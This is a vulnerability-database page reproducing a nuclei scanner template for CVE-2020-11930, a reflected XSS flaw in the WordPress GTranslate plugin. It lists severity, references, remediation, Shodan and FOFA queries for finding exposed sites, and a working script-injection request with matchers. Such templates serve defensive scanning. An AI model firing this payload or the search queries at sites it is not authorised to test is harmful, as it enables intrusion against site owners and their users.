Lucene search
K

WordPress GTranslate <2.8.52 - Cross-Site Scripting

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 31 Views

WordPress GTranslate <2.8.52 - Reflected Cross-Site Scripting vulnerability via crafted lin

Related
Refs
Code
id: CVE-2020-11930

info:
  name: WordPress GTranslate <2.8.52 - Cross-Site Scripting
  author: dhiyaneshDK
  severity: medium
  description: |
    WordPress GTranslate plugin before 2.8.52 contains an unauthenticated reflected cross-site scripting vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.
  impact: |
    Attackers can inject malicious JavaScript through a crafted link, potentially stealing user credentials, session tokens, or performing unauthorized actions on behalf of victims when they click the malicious link.
  remediation: |
    Update the WordPress GTranslate plugin to version 2.8.52 or later.
  reference:
    - https://wpscan.com/vulnerability/10181
    - https://payatu.com/blog/gaurav/analysis-of-cve-2020-11930:-reflected-xss-in-gtranslate-wordpress-module
    - https://plugins.trac.wordpress.org/changeset/2245581/gtranslate
    - https://plugins.trac.wordpress.org/changeset/2245591/gtranslate
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11930
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-11930
    cwe-id: CWE-79
    epss-score: 0.04457
    epss-percentile: 0.90273
    cpe: cpe:2.3:a:gtranslate:translate_wordpress_with_gtranslate:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: gtranslate
    product: translate_wordpress_with_gtranslate
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/gtranslate
    fofa-query: body=/wp-content/plugins/gtranslate
    publicwww-query: "/wp-content/plugins/gtranslate"
  tags: cve2020,cve,wordpress,wp,xss,wp-plugin,wpscan,gtranslate,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/does_not_exist"%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E<img%20src=x'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - 'uri-translation'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022037099f2e4f54c095536144dbea7cd7f0a05b840d3e392074e3d779b3efc73b8c022100dcb9f8f93fa6b43ea4f2db9b24bc4ab80c21675d97c89e67142ddf09a63734f5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 3.16.1
EPSS0.04457
31